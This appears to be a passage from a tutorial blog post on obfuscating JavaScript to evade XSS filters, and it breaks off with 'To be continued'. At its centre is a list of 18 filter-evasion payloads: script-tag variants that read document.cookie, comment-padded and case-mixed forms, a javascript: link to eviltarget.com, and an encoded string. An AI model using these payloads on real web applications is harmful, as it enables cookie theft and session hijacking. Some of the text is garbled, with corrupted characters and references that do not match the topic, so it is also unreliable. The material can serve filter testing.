Now our code is shortened and ready to be obfuscated. To obfuscate the code we will have to use an online tool. Online JavaScript Obfuscater confuses local variables, arguments of functions and methods, but doesn’t confuse javascript core and client’s functions, constructors, methods or properties. It is compatible with Core JavaScript, Client-Side JavaScript, W3C DOM, XML, XML Schemas(SOM), XSLT, AJAX(XMLHTTP) and other third party object. You may decide if confusing your owner’s global variables, functions, constructors, methods and properties in source code, according to obfuscating rules. The Obfuscater we are going to use is http://iframe.in/.[12]

But first we are going to compress more the code:

And now we will obfuscate the code using iframe.in :

<<<< Click on the image to enlarge it….>>>>>

Analyzing our needs

The above image is showing the options the obfuscater gave us to invade out filter. By saying that I mean that first we have to probe the filter to see what sort of encoding or filtering is doing (e.g. which characters removes). Now the only obvious issue here is the script tags, meaning that our tool did not encoded the <script> tag. Which means that we have to use other tricks to bypass filters that remove the script tag. Lets for now assume that the imaginary filters accept single quotes and parenthesis characters, with this assumption we can successfully use the Unicode and Unescape attacks.

By passing the the script issue

Below I am listing possible script tag alterations that I found in XSS cheat sheet and some that I have been using for probing XSS filters:

  1. <script>alert(document.cookie)</script>
  2. <script>alert(document.cookie);</script>
  3. <script>alert(”XSS”)</script>
  4. <script >alert(document.cookie)</script >
  5. <script>alert(String.fromCharCode(88,83,83))</script>
  6. <script/*aaaaaa*/>/*aaaaa*/alert(String.fromCharCode(88,83,83))/*aaaaa*/</script/*aaaaa*/>
  7. <script/**/>/**/alert(String.fromCharCode(/**/88,/**/83,/**/83))/**/</script/*aaaaa*/>
  8. <script/**/>/**/alert(’/**/XSS/**/’)/**/</script/*aaaaa*/>
  9. <script/**/>/**/alert(”/**/XSS/**/”)/**/</script/*aaaaa*/>
  10. <script type=”text/JavaScript”>alert(document.cookie)</script>
  11. <script language=”JavaScript” type=”text/JavaScript”>alert(document.cookie)</script>
  12. <script language=”JavaScript” type=”text/JavaScript”>alert(document.cookie)</script>
  13. <script language=”JaVaScRiPt” type=”text/JavaScript”>alert(document.cookie)</script>
  14. <script language=”JaVaScRiPt”>alert(document.cookie)</script>
  15. <script language=”JavaScript”>alert(document.cookie)</script>
  16. <a href=”javascript:document.location=’http://www.eviltarget.com/’”>XSS</a>
  17. ??script??alert(??XSS??)??/script??
  18. %A7%A2%BE%BC%F3%E3%F2%E9%F0%F4%BE%E1%EC%E5%F2%F4%A8430638%A9%BC%AF%F3%E3%F2%E9%F0%F4%BE

The basic rule is to avoid characters that are used to SQL injection and XSS attacks like single quotes, the dash character, the dot character and of course the script tag e.t.c.

Handling encoding filters

So after we do some XSS filter probing then we can start experimenting. The above method would work better in DOM based attacks or attacks that that you don’t need to include the script tag at all. Someone can very easily see that by using python. Try for example to escape the characters, by doing something like that:

cgi.escape(”XSS_payload”)

And see what is returned back. All above encoding (excluding raw html) remains unaffected (if we exclude of course the script tag).

Injecting the code

To be continued…

Reference [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

Reference [2]: http://www.ietf.org/rfc/rfc2109.txt

Reference [3]: http://www.w3schools.com/JS/default.asp

Reference [4]: http://www.w3schools.com/html/html_forms.asp

Reference [5]: http://www.javascriptobfuscator.com

Reference [6]: http://portswigger.net/suite/

Reference [7]: http://en.wikipedia.org/wiki/Words_per_minute

Reference [8]: Karat, C.M., Halverson, C., Horn, D. and Karat, J. (1999), Patterns of entry and correction in large vocabulary continuous speech recognition systems, CHI 99 Conference Proceedings, 568?€“575.

Reference [9]: Brown, C. M. (1988). Human-computer interface design guidelines. Norwood, NJ: Ablex Publishing.

Reference [10]: http://johanlouwers.blogspot.com/2006_12_17_archive.html

Reference [11]: http://elated.com/articles/javascript-timers-with-settimeout-and-setinterval/

Reference [12]:http://www.advancescripts.com/detailed/12532.html

Reference [13]:http://javascriptcompressor.com/

Reference [13]:http://iframe.in/